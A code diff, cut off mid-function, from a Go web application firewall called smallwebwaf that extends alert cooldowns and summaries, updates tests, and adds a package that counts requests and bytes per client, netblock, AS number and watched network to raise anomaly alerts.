@@ -36,7 +77,21 @@ go.yaml.in/yaml/v3 v3.0.5 h1:N6y/pJk8buWs9NY5ERU2HSMfm+IuD/OtfdAnq6kESPw=
go.yaml.in/yaml/v3 v3.0.5/go.mod h1:HVTZu1O7/Vkt2N+BFy8Zza+lnLsABggaTM2ZpNIGuKg= go.yaml.in/yaml/v3 v3.0.5/go.mod h1:HVTZu1O7/Vkt2N+BFy8Zza+lnLsABggaTM2ZpNIGuKg=
go4.org/netipx v0.0.0-20231129151722-fdeea329fbba h1:0b9z3AuHCjxk0x/opv64kcgZLBseWJUpBw5I82+2U4M= go4.org/netipx v0.0.0-20231129151722-fdeea329fbba h1:0b9z3AuHCjxk0x/opv64kcgZLBseWJUpBw5I82+2U4M=
go4.org/netipx v0.0.0-20231129151722-fdeea329fbba/go.mod h1:PLyyIXexvUFg3Owu6p/WfdlivPbZJsZdgWZlrGope/Y= go4.org/netipx v0.0.0-20231129151722-fdeea329fbba/go.mod h1:PLyyIXexvUFg3Owu6p/WfdlivPbZJsZdgWZlrGope/Y=
golang.org/x/mod v0.41.0 h1:qJmnOUb4YB+FsEuM3HcWucdZASCPGhsX6uljO6pog0c=
golang.org/x/mod v0.41.0/go.mod h1:Ek9pY8RKWXwsWvd3rQiHYtMqkjSUV+s1Rj7j4H5Ur6o=
golang.org/x/net v0.58.0 h1:ynWG7rqYi4ccpTEuPZ2QGWHktVEM9DMCj9yzDE0Q7To=
golang.org/x/net v0.58.0/go.mod h1:YwCddHnFlT7eLQqVprV19OnhLGtc5xOKgE0RyqgfWAU=
golang.org/x/sync v0.23.0 h1:KameEIfc1IkluZyXWLn39Wd4tURc6GbCiISGiZm2bQk=
golang.org/x/sync v0.23.0/go.mod h1:sUUOizhqBxiL6pEWpqNLUiaJn1ShEbZ6BBqskPbjZm0=
golang.org/x/sys v0.48.0 h1:bbX/i/6MgT9BVLM9RT1thmxL04yeTAhbEz4SyadbXoo= golang.org/x/sys v0.48.0 h1:bbX/i/6MgT9BVLM9RT1thmxL04yeTAhbEz4SyadbXoo=
golang.org/x/sys v0.48.0/go.mod h1:hNLxWAXmnKAxqDtdwIYC4bM9oQPEecfsnNMuSxOs3og= golang.org/x/sys v0.48.0/go.mod h1:hNLxWAXmnKAxqDtdwIYC4bM9oQPEecfsnNMuSxOs3og=
golang.org/x/text v0.41.0 h1:vz/seA0lnX87Othu2f/0L24RcgrXD9/YFTSuGjj3rH8=
golang.org/x/text v0.41.0/go.mod h1:jvf1O8ajNzZqhSrQBPbutR/EB83Cc0CFrezNQIwbb5M=
golang.org/x/tools v0.50.0 h1:c2ifzfcuY7L90lZ2aKd8S4K2NpASF08SZx9ZuJkHmSU=
golang.org/x/tools v0.50.0/go.mod h1:7ulVMw3831Mwi5EZD6RomGyffr4VFjuNYXf2BbCEAV0=
google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE=
google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
rsc.io/binaryregexp v0.2.0 h1:HfqmD5MEmC0zvwBuF187nq9mdnXjXsSivRiXN7SmRkE=
rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8=
+93 -44
View File
@@ -1,5 +1,6 @@
// Package alerts sends alerts on bans, on a source that fails and on a // Package alerts sends alerts on bans, on traffic over an anomaly
// file with an error to each destination set: to the webhook // threshold, on a source that fails and on a file with an error to each
// destination set: to the webhook
// SWWAF_ALERT_WEBHOOK_URL names, each as one JSON object, as the "Alert // SWWAF_ALERT_WEBHOOK_URL names, each as one JSON object, as the "Alert
// webhook schema" section of SPEC.md describes, to the Slack incoming // webhook schema" section of SPEC.md describes, to the Slack incoming
// webhook SWWAF_ALERT_SLACK_WEBHOOK_URL names, as a message, and to the // webhook SWWAF_ALERT_SLACK_WEBHOOK_URL names, as a message, and to the
@@ -40,20 +41,30 @@ const (
// EventPermanentBan is a permanent ban smallwebwaf made, or a ban it // EventPermanentBan is a permanent ban smallwebwaf made, or a ban it
// made permanent. // made permanent.
EventPermanentBan = "permanent_ban" EventPermanentBan = "permanent_ban"
// EventWAFBlock, EventAnomaly and EventReputationHit come with the // EventAnomaly is a count of requests or bytes over an anomaly
// Core Rule Set, the anomaly thresholds and the reputation sources; // threshold.
// nothing raises them yet.
EventWAFBlock = "waf_block"
EventAnomaly = "anomaly" EventAnomaly = "anomaly"
// EventWAFBlock is a request the Core Rule Set scored at or over
// SWWAF_WAF_ANOMALY_THRESHOLD, refused in block mode, let through in
// detect mode.
EventWAFBlock = "waf_block"
// EventReputationHit is a request whose client a blocklist, the
// CrowdSec decision list or a DNSBL zone lists, or whose AbuseIPDB score
// is a hit.
EventReputationHit = "reputation_hit" EventReputationHit = "reputation_hit"
// EventSourceFailure is GeoJS failing or refusing smallwebwaf. // EventSourceFailure is GeoJS failing or refusing smallwebwaf, a fetch
// of a list failing, a query to a DNSBL zone or a check with AbuseIPDB
// failing or refused, or the day's AbuseIPDB checks used up.
EventSourceFailure = "source_failure" EventSourceFailure = "source_failure"
// EventFileError is a rule file or state file edited while smallwebwaf // EventFileError is a rule file or state file edited while smallwebwaf
// runs that does not parse, a replacement of the lookup database that // runs that does not parse, a replacement of the lookup database that
// cannot be read, or a state file that cannot be written. // cannot be read, or a state file that cannot be written.
EventFileError = "file_error" EventFileError = "file_error"
// EventSummary is the summary of the alerts an hour held back past // EventSummary is the summary sent as an hour ends: of the alerts held
// SWWAF_ALERT_MAX_PER_HOUR. SWWAF_ALERT_EVENTS does not name it. // back in it past SWWAF_ALERT_MAX_PER_HOUR, and of the repeats held
// back by the cooldowns dropped as it ends, which no alert let through
// has given. It is sent with SWWAF_ALERT_MAX_PER_HOUR off too, for
// those repeats. SWWAF_ALERT_EVENTS does not name it.
EventSummary = "summary" EventSummary = "summary"
) )
@@ -153,18 +164,22 @@ type Alert struct {
ASName string `json:"as_name"` ASName string `json:"as_name"`
Country string `json:"country"` Country string `json:"country"`
// Reason is a short sentence, and Detail what is particular to the // Reason is a short sentence, and Detail what is particular to the
// event: for a file_error, its "file", and for a source_failure, its // event: for a file_error, its "file", for a source_failure, its
// "source", which the cooldown tells repeats by. // "source", and for an anomaly, its "scope", with the "asn" or the
// "name" of some scopes, which the cooldown tells repeats by.
Reason string `json:"reason"` Reason string `json:"reason"`
Detail map[string]any `json:"detail"` Detail map[string]any `json:"detail"`
// SuppressedRepeats is how many repeats of the alert the cooldown // SuppressedRepeats is how many repeats of the alert the cooldown
// held back since the last one let through. // held back since the last one let through. For a summary, it is how
// many the cooldowns dropped as the hour ended had held back that no
// alert let through gave.
SuppressedRepeats int `json:"suppressed_repeats"` SuppressedRepeats int `json:"suppressed_repeats"`
} }
// Cooldown is, for an event on a netblock, or about a file or a source, // Cooldown is, for an event on a netblock, about a file or a source, or
// when the last alert let through was raised, and how many repeats the // for an anomaly in a scope, when the last alert let through was raised,
// cooldown has held back since, as alerts.json holds it. // and how many repeats the cooldown has held back since, as alerts.json
// holds it.
// //
//nolint:tagliatelle // the state files use snake_case, as the request log does //nolint:tagliatelle // the state files use snake_case, as the request log does
type Cooldown struct { type Cooldown struct {
@@ -172,6 +187,9 @@ type Cooldown struct {
Netblock netip.Prefix `json:"netblock"` Netblock netip.Prefix `json:"netblock"`
File string `json:"file,omitempty"` File string `json:"file,omitempty"`
Source string `json:"source,omitempty"` Source string `json:"source,omitempty"`
Scope string `json:"scope,omitempty"`
ASN string `json:"asn,omitempty"`
Name string `json:"name,omitempty"`
Sent time.Time `json:"sent"` Sent time.Time `json:"sent"`
SuppressedRepeats int `json:"suppressed_repeats"` SuppressedRepeats int `json:"suppressed_repeats"`
} }
@@ -214,7 +232,7 @@ type Queue struct {
mu sync.Mutex mu sync.Mutex
// cooldowns are the alerts last let through, by event and netblock, // cooldowns are the alerts last let through, by event and netblock,
// file or source. // file, source or scope.
cooldowns map[cooldownKey]*Cooldown cooldowns map[cooldownKey]*Cooldown
hour Hour hour Hour
@@ -248,21 +266,28 @@ type destination struct {
} }
// cooldownKey is what makes an alert a repeat of another: the same event // cooldownKey is what makes an alert a repeat of another: the same event
// on the same netblock, and about the same file or source, as its detail // on the same netblock, and about the same file or source, or in the same
// names them. Each is empty for an alert without one. // scope with the same AS number or name, as its detail names them. Each
// is empty for an alert without one.
type cooldownKey struct { type cooldownKey struct {
event string event string
netblock netip.Prefix netblock netip.Prefix
file string file string
source string source string
scope string
asn string
name string
} }
// cooldownKeyOf returns what makes another alert a repeat of alert. // cooldownKeyOf returns what makes another alert a repeat of alert.
func cooldownKeyOf(alert *Alert) cooldownKey { func cooldownKeyOf(alert *Alert) cooldownKey {
file, _ := alert.Detail["file"].(string) file, _ := alert.Detail["file"].(string)
source, _ := alert.Detail["source"].(string) source, _ := alert.Detail["source"].(string)
scope, _ := alert.Detail["scope"].(string)
asn, _ := alert.Detail["asn"].(string)
name, _ := alert.Detail["name"].(string)
return cooldownKey{alert.Event, alert.Netblock, file, source} return cooldownKey{alert.Event, alert.Netblock, file, source, scope, asn, name}
} }
// New returns a Queue with no alert yet. // New returns a Queue with no alert yet.
@@ -295,14 +320,14 @@ func New(params Params) *Queue {
// unless no destination is set or SWWAF_ALERT_EVENTS leaves its event // unless no destination is set or SWWAF_ALERT_EVENTS leaves its event
// out. It gives alert the instance and the time. An alert that repeats // out. It gives alert the instance and the time. An alert that repeats
// the last one let through less than Cooldown before is held back and // the last one let through less than Cooldown before is held back and
// counted, and the next one let through gives that count. Past MaxPerHour // counted. The next one let through gives that count, unless an hour of
// alerts let through in the hour under way, by the clock, an alert is // the clock ends first after the cooldown has run out: the cooldown is
// held back for that hour's summary instead, which is sent once the hour // then dropped, and that hour's summary gives the count. Past MaxPerHour
// has ended; it starts no cooldown, and the repeats held back before it // alerts let through in the hour under way, an alert is held back for
// are given by the next alert let through. Raise never waits: an alert // that hour's summary instead, which is sent once the hour has ended; it
// let through joins the queue of each destination, from which Run sends // starts no cooldown. Raise never waits: an alert let through joins the
// it, and with queueSize alerts waiting for a destination, the oldest is // queue of each destination, from which Run sends it, and with queueSize
// dropped. // alerts waiting for a destination, the oldest is dropped.
func (q *Queue) Raise(alert Alert) { func (q *Queue) Raise(alert Alert) {
if len(q.destinations) == 0 || !slices.Contains(q.params.Events, alert.Event) { if len(q.destinations) == 0 || !slices.Contains(q.params.Events, alert.Event) {
return return
@@ -425,7 +450,8 @@ func (q *Queue) Suppressed() int64 {
} }
// Snapshot returns the queue's state, as alerts.json holds it, with the // Snapshot returns the queue's state, as alerts.json holds it, with the
// cooldowns sorted by netblock, then by event, file and source. // cooldowns sorted by netblock, then by event, file, source, scope, AS
// number and name.
func (q *Queue) Snapshot() State { func (q *Queue) Snapshot() State {
q.mu.Lock() q.mu.Lock()
defer q.mu.Unlock() defer q.mu.Unlock()
@@ -443,7 +469,9 @@ func (q *Queue) Snapshot() State {
slices.SortFunc(state.Cooldowns, func(a, b Cooldown) int { slices.SortFunc(state.Cooldowns, func(a, b Cooldown) int {
return cmp.Or(a.Netblock.Compare(b.Netblock), cmp.Compare(a.Event, b.Event), return cmp.Or(a.Netblock.Compare(b.Netblock), cmp.Compare(a.Event, b.Event),
cmp.Compare(a.File, b.File), cmp.Compare(a.Source, b.Source)) cmp.Compare(a.File, b.File), cmp.Compare(a.Source, b.Source),
cmp.Compare(a.Scope, b.Scope), cmp.Compare(a.ASN, b.ASN),
cmp.Compare(a.Name, b.Name))
}) })
for _, d := range q.destinations { for _, d := range q.destinations {
@@ -466,7 +494,10 @@ func (q *Queue) Load(state State) {
for _, cooldown := range state.Cooldowns { for _, cooldown := range state.Cooldowns {
cooldown.Netblock = cooldown.Netblock.Masked() cooldown.Netblock = cooldown.Netblock.Masked()
key := cooldownKey{cooldown.Event, cooldown.Netblock, cooldown.File, cooldown.Source} key := cooldownKey{
cooldown.Event, cooldown.Netblock, cooldown.File, cooldown.Source,
cooldown.Scope, cooldown.ASN, cooldown.Name,
}
q.cooldowns[key] = &cooldown q.cooldowns[key] = &cooldown
} }
@@ -538,46 +569,64 @@ func (q *Queue) startCooldown(alert *Alert, now time.Time) {
q.cooldowns[key] = &Cooldown{ q.cooldowns[key] = &Cooldown{
Event: alert.Event, Netblock: alert.Netblock, File: key.file, Source: key.source, Event: alert.Event, Netblock: alert.Netblock, File: key.file, Source: key.source,
Sent: now, Scope: key.scope, ASN: key.asn, Name: key.name, Sent: now,
} }
} }
// endHour ends the hour under way, if now is past it: it queues that // endHour ends the hour under way, if now is past it. It drops the
// hour's summary when alerts were held back in it past MaxPerHour, and // cooldowns that have run out, whatever repeats they held back, so that
// forgets the cooldowns that have run out with no repeat held back, which // they do not pile up, and queues that hour's summary when alerts were
// no alert needs any more. // held back in it past MaxPerHour, or when a cooldown dropped had held
// back repeats, which no alert let through has given: the summary gives
// them.
func (q *Queue) endHour(now time.Time) { func (q *Queue) endHour(now time.Time) {
start := now.Truncate(time.Hour) start := now.Truncate(time.Hour)
if !start.After(q.hour.Start) { if !start.After(q.hour.Start) {
return return
} }
repeats := 0
for key, cooldown := range q.cooldowns {
if now.Sub(cooldown.Sent) >= q.params.Cooldown {
repeats += cooldown.SuppressedRepeats
delete(q.cooldowns, key)
}
}
heldBack := 0 heldBack := 0
for _, count := range q.hour.HeldBack { for _, count := range q.hour.HeldBack {
heldBack += count heldBack += count
} }
var reasons []string
if heldBack > 0 { if heldBack > 0 {
reasons = append(reasons, fmt.Sprintf("%d alerts held back in the hour from %s, "+
"past the %d an hour SWWAF_ALERT_MAX_PER_HOUR allows", heldBack,
q.hour.Start.Format(time.RFC3339), q.params.MaxPerHour))
}
if repeats > 0 {
reasons = append(reasons, fmt.Sprintf("%d repeats held back by "+
"SWWAF_ALERT_COOLDOWN that no later alert gives", repeats))
}
if len(reasons) > 0 {
q.queue(&Alert{ q.queue(&Alert{
Instance: q.params.Instance, Instance: q.params.Instance,
Time: now, Time: now,
Event: EventSummary, Event: EventSummary,
Reason: fmt.Sprintf("%d alerts held back in the hour from %s, past the %d "+ Reason: strings.Join(reasons, "; "),
"an hour SWWAF_ALERT_MAX_PER_HOUR allows", heldBack,
q.hour.Start.Format(time.RFC3339), q.params.MaxPerHour),
Detail: map[string]any{ Detail: map[string]any{
"hour": q.hour.Start, "count": heldBack, "events": q.hour.HeldBack, "hour": q.hour.Start, "count": heldBack, "events": q.hour.HeldBack,
}, },
SuppressedRepeats: repeats,
}) })
} }
q.hour = Hour{Start: start, HeldBack: map[string]int{}} q.hour = Hour{Start: start, HeldBack: map[string]int{}}
for key, cooldown := range q.cooldowns {
if now.Sub(cooldown.Sent) >= q.params.Cooldown && cooldown.SuppressedRepeats == 0 {
delete(q.cooldowns, key)
}
}
} }
// queue adds alert to the alerts waiting for each destination. // queue adds alert to the alerts waiting for each destination.
+87 -25
View File
@@ -381,7 +381,7 @@ func TestAlertsPastTheHourlyLimitAreRolledIntoOneSummary(t *testing.T) {
}) })
} }
func TestRepeatsBeforeAnAlertPastTheHourlyLimitAreGivenByTheNextSent(t *testing.T) { func TestRepeatsBeforeAnAlertPastTheHourlyLimitAreGivenByTheSummary(t *testing.T) {
t.Parallel() t.Parallel()
synctest.Test(t, func(t *testing.T) { synctest.Test(t, func(t *testing.T) {
@@ -401,8 +401,8 @@ func TestRepeatsBeforeAnAlertPastTheHourlyLimitAreGivenByTheNextSent(t *testing.
time.Sleep(cooldown) time.Sleep(cooldown)
raise() raise()
// The next hour's first alert gives the two repeats, and the summary // The summary gives the alert past the limit and the two repeats,
// the alert past the limit. // and the next hour's first alert none.
time.Sleep(time.Hour - cooldown) time.Sleep(time.Hour - cooldown)
synctest.Wait() synctest.Wait()
raise() raise()
@@ -413,11 +413,14 @@ func TestRepeatsBeforeAnAlertPastTheHourlyLimitAreGivenByTheNextSent(t *testing.
got := webhook.received() got := webhook.received()
if len(got) == 3 { if len(got) == 3 {
detail, _ := got[1].alert["detail"].(map[string]any) detail, _ := got[1].alert["detail"].(map[string]any)
repeats := got[2].alert["suppressed_repeats"] summaryRepeats := got[1].alert["suppressed_repeats"]
lastRepeats := got[2].alert["suppressed_repeats"]
if detail["count"] != float64(1) || repeats != float64(2) { if detail["count"] != float64(1) || summaryRepeats != float64(2) ||
t.Errorf("the summary counts %v alerts, and the last alert gives %v "+ lastRepeats != float64(0) {
"repeats, want 1 and 2", detail["count"], repeats) t.Errorf("the summary counts %v alerts and %v repeats, and the last "+
"alert gives %v repeats, want 1, 2 and 0", detail["count"],
summaryRepeats, lastRepeats)
} }
} }
@@ -425,6 +428,70 @@ func TestRepeatsBeforeAnAlertPastTheHourlyLimitAreGivenByTheNextSent(t *testing.
}) })
} }
func TestCooldownsThatHaveRunOutAreDroppedAndTheirRepeatsSummedUp(t *testing.T) {
t.Parallel()
for name, maxPerHour := range map[string]int{"limit off": 0, "limit set": 60} {
t.Run(name, func(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
params := newParams()
params.MaxPerHour = maxPerHour
webhook, q := start(t, params)
// For four hours, a netblock of its own each minute is over an
// anomaly threshold twice: an alert, and a repeat the cooldown
// holds back.
netblocks := 0
for range 4 {
for range 60 {
anomaly := alerts.Alert{
Event: alerts.EventAnomaly, Netblock: netblock(netblocks),
Detail: map[string]any{"scope": "net"},
}
q.Raise(anomaly)
q.Raise(anomaly)
netblocks++
time.Sleep(time.Minute)
}
// As the hour ends, only the cooldowns started less than the
// cooldown before are kept, in memory and for alerts.json.
synctest.Wait()
kept := len(q.Snapshot().Cooldowns)
if kept > int(cooldown/time.Minute) {
t.Errorf("after %d netblocks, %d cooldowns are kept, want at most %d",
netblocks, kept, int(cooldown/time.Minute))
}
}
// An hour on, every cooldown has been dropped, and the summaries
// have given every repeat.
time.Sleep(time.Hour)
synctest.Wait()
repeats := 0.0
for _, request := range webhook.received() {
count, _ := request.alert["suppressed_repeats"].(float64)
repeats += count
}
kept := len(q.Snapshot().Cooldowns)
if kept != 0 || repeats != float64(netblocks) {
t.Errorf("%d cooldowns are kept and the webhook was given %v repeats, "+
"want 0 and %d", kept, repeats, netblocks)
}
})
})
}
}
func TestFailedRequestIsSentAgainWithBackoff(t *testing.T) { func TestFailedRequestIsSentAgainWithBackoff(t *testing.T) {
t.Parallel() t.Parallel()
@@ -635,7 +702,8 @@ func TestStateLoadedIntoANewQueueCarriesOn(t *testing.T) {
after.Load(roundTrip(t, before.Snapshot())) after.Load(roundTrip(t, before.Snapshot()))
// The new queue sends the alert waiting, holds back the repeat as // The new queue sends the alert waiting, holds back the repeat as
// the cooldown still runs, and sends the summary of the hour. // the cooldown still runs, and sends the summary of the hour, which
// gives both repeats, as the cooldown has run out.
after.Raise(alerts.Alert{Event: alerts.EventBan, Netblock: netblock(1)}) after.Raise(alerts.Alert{Event: alerts.EventBan, Netblock: netblock(1)})
synctest.Wait() synctest.Wait()
wantEvents(t, webhook, alerts.EventBan) wantEvents(t, webhook, alerts.EventBan)
@@ -644,18 +712,12 @@ func TestStateLoadedIntoANewQueueCarriesOn(t *testing.T) {
synctest.Wait() synctest.Wait()
wantEvents(t, webhook, alerts.EventBan, alerts.EventSummary) wantEvents(t, webhook, alerts.EventBan, alerts.EventSummary)
detail, _ := webhook.received()[1].alert["detail"].(map[string]any) summary := webhook.received()[1].alert
if detail["count"] != float64(1) { detail, _ := summary["detail"].(map[string]any)
t.Errorf("the summary counts %v alerts, want 1", detail["count"])
}
// The cooldown has run out, and the next one gives both repeats. if detail["count"] != float64(1) || summary["suppressed_repeats"] != float64(2) {
after.Raise(alerts.Alert{Event: alerts.EventBan, Netblock: netblock(1)}) t.Errorf("the summary counts %v alerts and %v repeats, want 1 and 2",
synctest.Wait() detail["count"], summary["suppressed_repeats"])
got := webhook.received()
if repeats := got[len(got)-1].alert["suppressed_repeats"]; repeats != float64(2) {
t.Errorf("the last alert gives %v repeats, want 2", repeats)
} }
}) })
} }
@@ -701,8 +763,8 @@ func TestSlackAndNtfyAreSentTheSummaryAndTheRepeatsHeldBack(t *testing.T) {
ban := alerts.Alert{Event: alerts.EventBan, Netblock: netblock(1), Reason: "a ban"} ban := alerts.Alert{Event: alerts.EventBan, Netblock: netblock(1), Reason: "a ban"}
// The hour's one alert, a repeat of it the cooldown holds back, and // The hour's one alert, a repeat of it the cooldown holds back, and
// an alert past the limit; once the hour has ended, its summary, and // an alert past the limit; once the hour has ended, its summary,
// the next alert, which gives the repeat. // which gives the repeat, and the next alert, which gives none.
q.Raise(ban) q.Raise(ban)
q.Raise(ban) q.Raise(ban)
q.Raise(alerts.Alert{Event: alerts.EventFileError, Reason: "a file error"}) q.Raise(alerts.Alert{Event: alerts.EventFileError, Reason: "a file error"})
@@ -720,14 +782,14 @@ func TestSlackAndNtfyAreSentTheSummaryAndTheRepeatsHeldBack(t *testing.T) {
} }
const summary = "1 alerts held back in the hour from 2000-01-01T00:00:00Z, " + const summary = "1 alerts held back in the hour from 2000-01-01T00:00:00Z, " +
"past the 1 an hour SWWAF_ALERT_MAX_PER_HOUR allows" "past the 1 an hour SWWAF_ALERT_MAX_PER_HOUR allows; 1 repeats held back " +
"by SWWAF_ALERT_COOLDOWN that no later alert gives\nsuppressed repeats: 1"
wantSlackMessage(t, slack[1], "*"+instance+": summary*\n"+summary) wantSlackMessage(t, slack[1], "*"+instance+": summary*\n"+summary)
wantNtfyMessage(t, ntfy[1], instance+": summary", "default bar_chart", summary) wantNtfyMessage(t, ntfy[1], instance+": summary", "default bar_chart", summary)
wantSlackMessage(t, slack[2], wantSlackMessage(t, slack[2], "*"+instance+": ban*\na ban\nnetblock: 203.0.113.1/32")
"*"+instance+": ban*\na ban\nnetblock: 203.0.113.1/32\nsuppressed repeats: 1")
wantNtfyMessage(t, ntfy[2], instance+": ban", "default no_entry", wantNtfyMessage(t, ntfy[2], instance+": ban", "default no_entry",
"a ban\nnetblock: 203.0.113.1/32\nsuppressed repeats: 1") "a ban\nnetblock: 203.0.113.1/32")
}) })
} }
+408
View File
@@ -0,0 +1,408 @@
// Package anomaly counts requests and bytes over a minute and an hour, per
// client, per surrounding netblock, per AS number, for the whole service
// and per named netblock, and raises an anomaly alert for a count over its
// threshold, as "Anomaly thresholds" under "Configuration surface" in
// SPEC.md describes. It refuses and bans nothing. At most 20,000 counters
// are kept, in memory, and written to alerts.json and read from it by the
// state package.
package anomaly
import (
"cmp"
"fmt"
"net/netip"
"slices"
"sync"
"time"
"github.com/hashicorp/golang-lru/v2/simplelru"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
)
// maxCounters is how many counters are kept. Past it, the counter counted
// least recently is dropped, and starts afresh if it is counted again.
const maxCounters = 20000
// The scopes, what a counter counts, as the settings, alerts.json and the
// alerts name them.
const (
// ScopeClient is one client: an IPv4 address, or an IPv6 netblock of
// SWWAF_IPV6_GROUP_PREFIX.
ScopeClient = "client"
// ScopeNet is the netblock around a client, SWWAF_ANOMALY_NET_V4_PREFIX
// or SWWAF_ANOMALY_NET_V6_PREFIX long.
ScopeNet = "net"
// ScopeASN is an AS number.
ScopeASN = "asn"
// ScopeTotal is the whole service.
ScopeTotal = "total"
// ScopeWatch is a named netblock of SWWAF_WATCH_NETS.
ScopeWatch = "watch"
)
// Scopes returns every scope.
func Scopes() []string {
return []string{ScopeClient, ScopeNet, ScopeASN, ScopeTotal, ScopeWatch}
}
// The windows a counter counts in, as the alerts name them.
const (
minute = "minute"
hour = "hour"
)
// Thresholds are the most requests and the most bytes a scope may have
// counted in a minute and in an hour before an alert is raised. Zero is
// off.
type Thresholds struct {
RequestsPerMinute int64
RequestsPerHour int64
BytesPerMinute int64
BytesPerHour int64
}
// NamedNetblock is a netblock SWWAF_WATCH_NETS names.
type NamedNetblock struct {
Name string
Netblock netip.Prefix
}
// Params are what New needs.
type Params struct {
// The thresholds of each scope: SWWAF_ANOMALY_CLIENT_*,
// SWWAF_ANOMALY_NET_*, SWWAF_ANOMALY_ASN_*, SWWAF_ANOMALY_TOTAL_* and
// SWWAF_WATCH_*.
Client, Net, ASN, Total, Watch Thresholds
// NetV4Prefix and NetV6Prefix are the lengths of the netblock around a
// client (SWWAF_ANOMALY_NET_V4_PREFIX and SWWAF_ANOMALY_NET_V6_PREFIX).
NetV4Prefix, NetV6Prefix int
// NamedNetblocks are SWWAF_WATCH_NETS.
NamedNetblocks []NamedNetblock
// Alerts receive the anomaly alerts.
Alerts *alerts.Queue
}
// Counter is one scope's counts, as alerts.json holds them: the scope,
// with the netblock, the AS number or the name that tells it from the
// others in that scope, and its two buckets of requests and of bytes in
// the minute and in the hour. A bucket whose threshold is off counts
// nothing, and is left out.
//
//nolint:tagliatelle // the state files use snake_case, as the request log does
type Counter struct {
Scope string `json:"scope"`
Netblock netip.Prefix `json:"netblock,omitzero"`
ASN string `json:"asn,omitempty"`
Name string `json:"name,omitempty"`
Minute ratelimit.Buckets `json:"minute,omitzero"`
Hour ratelimit.Buckets `json:"hour,omitzero"`
MinuteBytes ratelimit.Buckets `json:"minute_bytes,omitzero"`
HourBytes ratelimit.Buckets `json:"hour_bytes,omitzero"`
}
// Request is a request that has ended, as the counters count it.
type Request struct {
// Client is the client's address, and ClientGroup the client it is
// counted as: its IPv4 address, or the IPv6 netblock of
// SWWAF_IPV6_GROUP_PREFIX its address is in.
Client netip.Addr
ClientGroup netip.Prefix
// ASN, ASName and Country are the client's as looked up, each "" when
// unknown.
ASN, ASName, Country string
// Bytes are the request's bytes, as SWWAF_BYTES_COUNT counts them.
Bytes int64
}
// Counters counts each request in the scopes it is in. It is safe for
// concurrent use.
type Counters struct {
params Params
mu sync.Mutex
counters *simplelru.LRU[key, *Counter]
}
// key is what tells a counter from the others: its scope, with its
// netblock, AS number or name.
type key struct {
scope string
netblock netip.Prefix
asn string
name string
}
// New returns Counters for params, with nothing counted yet.
func New(params Params) *Counters {
counters, err := simplelru.NewLRU[key, *Counter](maxCounters, nil)
if err != nil {
panic(err) // NewLRU fails only for a size below one
}
return &Counters{params: params, counters: counters}
}
// Count counts r, a request that has ended, at now, in each scope it is
// in whose thresholds are not all off: its client, the netblock around
// it, its AS number once known, the whole service, and each named
// netblock it is in. Only the counts whose threshold is set are counted.
// For each scope whose count is over a threshold, it raises an anomaly
// alert, for the first such count in the order requests and bytes in the
// minute, then in the hour; the alert queue's cooldown holds back the
// repeats. Nothing is refused or banned.
func (c *Counters) Count(now time.Time, r Request) {
var raised []alerts.Alert
c.mu.Lock()
for _, scope := range c.scopesOf(r) {
counter, found := c.counters.Get(scope.key)
if !found {
counter = scope.key.counter()
c.counters.Add(scope.key, counter)
}
over, passed := counter.add(now, r.Bytes, scope.thresholds)
if passed {
raised = append(raised, alertFor(r, scope.key, over))
}
}
c.mu.Unlock()
for _, alert := range raised {
c.params.Alerts.Raise(alert)
}
}
// Snapshot returns every counter, sorted by scope, then by netblock, AS
// number and name, as alerts.json lists them.
func (c *Counters) Snapshot() []Counter {
c.mu.Lock()
counters := make([]Counter, 0, c.counters.Len())
for _, counter := range c.counters.Values() {
counters = append(counters, *counter)
}
c.mu.Unlock()
slices.SortFunc(counters, func(a, b Counter) int {
return cmp.Or(cmp.Compare(a.Scope, b.Scope), a.Netblock.Compare(b.Netblock),
cmp.Compare(a.ASN, b.ASN), cmp.Compare(a.Name, b.Name))
})
return counters
}
// Load puts counters, read from alerts.json, in place of those held, in
// the order they were last counted, as the starts of their buckets tell,
// so that the one counted least recently is dropped first. Each netblock
// is masked to its length, so that 203.0.113.9/24 is 203.0.113.0/24.
// Buckets whose time has passed at now are emptied, and a counter left
// with every bucket empty is dropped.
func (c *Counters) Load(counters []Counter, now time.Time) {
counters = slices.Clone(counters)
slices.SortStableFunc(counters, func(a, b Counter) int {
return a.lastStart().Compare(b.lastStart())
})
c.mu.Lock()
defer c.mu.Unlock()
c.counters.Purge()
for _, counter := range counters {
counter.Netblock = counter.Netblock.Masked()
empty := true
for _, count := range counter.counts() {
if count.buckets.Passed(now, count.length) {
*count.buckets = ratelimit.Buckets{}
}
empty = empty && *count.buckets == ratelimit.Buckets{}
}
if !empty {
c.counters.Add(counter.key(), &counter)
}
}
}
// scope is a scope a request is counted in, and its thresholds.
type scope struct {
key key
thresholds Thresholds
}
// scopesOf returns the scopes r is in whose thresholds are not all off.
func (c *Counters) scopesOf(r Request) []scope {
p := c.params
client := r.Client.Unmap()
all := []scope{
{key{scope: ScopeClient, netblock: r.ClientGroup}, p.Client},
{key{scope: ScopeNet, netblock: c.netAround(client)}, p.Net},
{key{scope: ScopeTotal}, p.Total},
}
if r.ASN != "" {
all = append(all, scope{key{scope: ScopeASN, asn: r.ASN}, p.ASN})
}
for _, named := range p.NamedNetblocks {
if named.Netblock.Contains(client) {
all = append(all, scope{
key{scope: ScopeWatch, netblock: named.Netblock, name: named.Name}, p.Watch,
})
}
}
return slices.DeleteFunc(all, func(s scope) bool {
return s.thresholds == Thresholds{}
})
}
// netAround returns the netblock around client that ScopeNet counts it
// in: NetV4Prefix or NetV6Prefix long.
func (c *Counters) netAround(client netip.Addr) netip.Prefix {
length := c.params.NetV6Prefix
